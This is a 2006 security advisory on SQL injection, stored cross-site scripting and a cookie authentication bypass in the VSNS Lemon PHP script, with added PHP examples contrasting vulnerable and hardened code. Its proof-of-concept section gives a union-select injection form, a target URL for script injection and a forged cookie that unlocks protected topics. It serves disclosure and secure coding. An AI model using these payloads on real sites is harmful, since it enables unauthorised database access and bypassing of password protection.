Multiple Vulnerabilities in VSNS Lemon

Summary

Vulnerability: Multiple Vulnerabilities in VSNS Lemon
Discovered: 2006.03.27
Last Update: 2006.04.06 (exploitation code published)
ID: EV0106
CVE: CVE-2006-1553, CVE-2006-1554, CVE-2006-1555
Risk Level: medium
Type: Multiple Vulnerabilities
Status: Unpatched. No reply from developer(s)
Vendor: Tachyon (http://tachyondecay.net/)
Vulnerable Software: VSNS Lemon
Version: 3.2.0
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the VSNS Lemon script.

1. SQL Injection.

Vulnerable script: functions/final_functions.php

The $id variable is not properly sanitized before it is used in an SQL query. By injecting SQL code into it an attacker can bypass the password check for a protected topic or run arbitrary SQL statements against the database.

Condition: magic_quotes_gpc = off (with magic quotes enabled PHP escapes the single quote in the payload, which blocks this particular injection but is not a fix).
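As an added example that is not part of the advisory or of VSNS Lemon's own code, the following PHP script reproduces the pattern described above against an in-memory SQLite table and runs the PoC payload through both a string-built query and a parameterised one. The table layout, the four-column query shape and the function names are assumptions; the advisory only states that $id reaches the query unsanitised.

```php
<?php
// Added example (not VSNS Lemon's code): the vulnerable pattern from the
// advisory next to a parameterised replacement, run against an in-memory
// SQLite table so the union-select payload can be observed offline.
// Table layout, column count and query shape are assumptions.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE topics (id INTEGER, title TEXT, body TEXT, password TEXT)');
$db->exec("INSERT INTO topics VALUES (1, 'secret topic', 'members only', 'letmein')");

// Vulnerable: $id and $password are interpolated straight into the SQL text.
// With magic_quotes_gpc = off nothing escapes the quote in the attacker's id.
function checkpass_vulnerable(PDO $db, string $id, string $password): ?array
{
    $sql = "SELECT * FROM topics WHERE id = '$id' AND password = '$password'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: bound parameters keep user input out of the SQL grammar, so the
// quote and the UNION in the payload are just characters in a string value.
function checkpass_hardened(PDO $db, string $id, string $password): ?array
{
    $stmt = $db->prepare('SELECT * FROM topics WHERE id = ? AND password = ?');
    $stmt->execute([$id, $password]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The payload from the advisory's PoC form: the quote closes the id literal,
// UNION SELECT supplies a fabricated row (the four constants must match the
// column count of the real query), and /* comments out the password check.
$payload = "9999' union select 123,4,5,6/*";
$wrongPw = '123';

$leaked = checkpass_vulnerable($db, $payload, $wrongPw);
echo "vulnerable: ", $leaked ? 'access granted, row = ' . json_encode($leaked) : 'denied', "\n";

$blocked = checkpass_hardened($db, $payload, $wrongPw);
echo "hardened:   ", $blocked ? 'access granted' : 'denied', "\n";

// The legitimate path still works with bound parameters.
$ok = checkpass_hardened($db, '1', 'letmein');
echo "hardened, real password: ", $ok ? "access granted to '{$ok['title']}'" : 'denied', "\n";
```

Run it with the PHP CLI (the pdo_sqlite extension must be loaded). The string-built query returns the fabricated row for the payload, which the application would treat as a successful password check; the prepared statement returns no row, because the quote and UNION are now inside a bound string value. Since magic_quotes_gpc was removed in PHP 5.4, the advisory's condition is always met on any current PHP.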

2. Cross-Site Scripting.

The 'name' parameter of the add-comment form is not properly sanitized before it is stored and displayed. This can be used to post arbitrary HTML or JavaScript code, which runs in the browser of anyone who views the comments.

3. Cookie-Based Authentication Bypass.

Authentication for password-protected articles can be bypassed. The password-checking function does not compare the password at all; it only checks whether a cookie for the topic exists, so any value in that cookie unlocks the topic.
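The following PHP, added here as an example and not taken from VSNS Lemon, shows the comment rendering (issue 2) and the protected-topic check (issue 3) in their vulnerable and hardened forms. The cookie layout vsns[topic_id] comes from the PoC below; the server secret, the stored password hash and all function names are assumptions made for this example.

```php
<?php
// Added example (not VSNS Lemon's code): issues 2 and 3 from the description
// side by side with a fix. Cookie layout follows the advisory's PoC
// (vsns[topic_id]); the secret, topic record and function names are assumed.

// --- 2. Cross-site scripting in the comment 'name' parameter ---

// Vulnerable: the submitted name is echoed into the page verbatim.
function render_comment_vulnerable(string $name, string $text): string
{
    return '<div class="comment"><b>' . $name . '</b>: ' . $text . '</div>';
}

// Hardened: encode every user-controlled value for the HTML context it lands
// in. ENT_QUOTES also covers attribute values; the charset must match the page.
function render_comment_hardened(string $name, string $text): string
{
    $h = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="comment"><b>' . $h($name) . '</b>: ' . $h($text) . '</div>';
}

// --- 3. Cookie-based authentication bypass for protected topics ---

// Vulnerable: only asks whether a cookie for the topic exists, so
// "Cookie: vsns[1]=1" unlocks topic 1 without knowing its password.
function can_read_vulnerable(array $cookies, int $topicId): bool
{
    return isset($cookies['vsns'][$topicId]);
}

// Hardened: after a successful password check the server issues an HMAC over
// the topic id and the topic's current password hash, keyed with a secret the
// client never sees. Reading requires presenting exactly that token, and
// changing the topic password invalidates tokens issued earlier.
const SERVER_SECRET = 'replace-with-a-random-secret-from-config'; // assumption

function issue_read_token(int $topicId, string $storedPasswordHash): string
{
    return hash_hmac('sha256', $topicId . ':' . $storedPasswordHash, SERVER_SECRET);
}

function can_read_hardened(array $cookies, int $topicId, string $storedPasswordHash): bool
{
    $presented = $cookies['vsns'][$topicId] ?? null;
    if (!is_string($presented)) {
        return false;
    }
    $expected = issue_read_token($topicId, $storedPasswordHash);
    return hash_equals($expected, $presented); // constant-time comparison
}

// A password check that actually compares, using PHP's password hashing API.
function unlock_topic(string $submitted, string $storedPasswordHash): bool
{
    return password_verify($submitted, $storedPasswordHash);
}

// Constructed demo input.
$topicId    = 1;
$storedHash = password_hash('letmein', PASSWORD_DEFAULT);
$evilName   = '<script>alert(document.cookie)</script>';

echo render_comment_vulnerable($evilName, 'hi'), "\n";
echo render_comment_hardened($evilName, 'hi'), "\n";

$forged = ['vsns' => [$topicId => '1']]; // the advisory's PoC cookie
echo 'forged cookie, vulnerable check: ', can_read_vulnerable($forged, $topicId) ? 'granted' : 'denied', "\n";
echo 'forged cookie, hardened check:   ', can_read_hardened($forged, $topicId, $storedHash) ? 'granted' : 'denied', "\n";

if (unlock_topic('letmein', $storedHash)) {
    $legit = ['vsns' => [$topicId => issue_read_token($topicId, $storedHash)]];
    echo 'issued token, hardened check:    ', can_read_hardened($legit, $topicId, $storedHash) ? 'granted' : 'denied', "\n";
}
```

The hardened check only verifies the cookie value; in a real deployment the token should also be set with the HttpOnly and Secure flags via setcookie(), and the topic passwords should be stored as password_hash() output rather than plaintext, as assumed above.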

PoC/Exploit

1. SQL Injection Example.

<form method="post" action="http://[host]/vsns/index.php">
<input type="hidden" name="towel" value="checkpass">
<input name="id" value="9999' union select 123,4,5,6/*">
<input type="password" name="password" value="123">
<input type="submit" value="Go">
</form>

2. Cross-Site Scripting Example

Submit a comment through the add-comment form on the page below, using the payload as the name.

Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display

Name: [XSS]

3. Authentication Bypass Example.

Read any password-protected topic by sending a cookie for its id with any value, e.g. for topic 1:

Cookie: vsns[1]=1

Solution.

Solution for "Multiple Vulnerabilities in VSNS Lemon" is not available. Check Tachyon website for updates.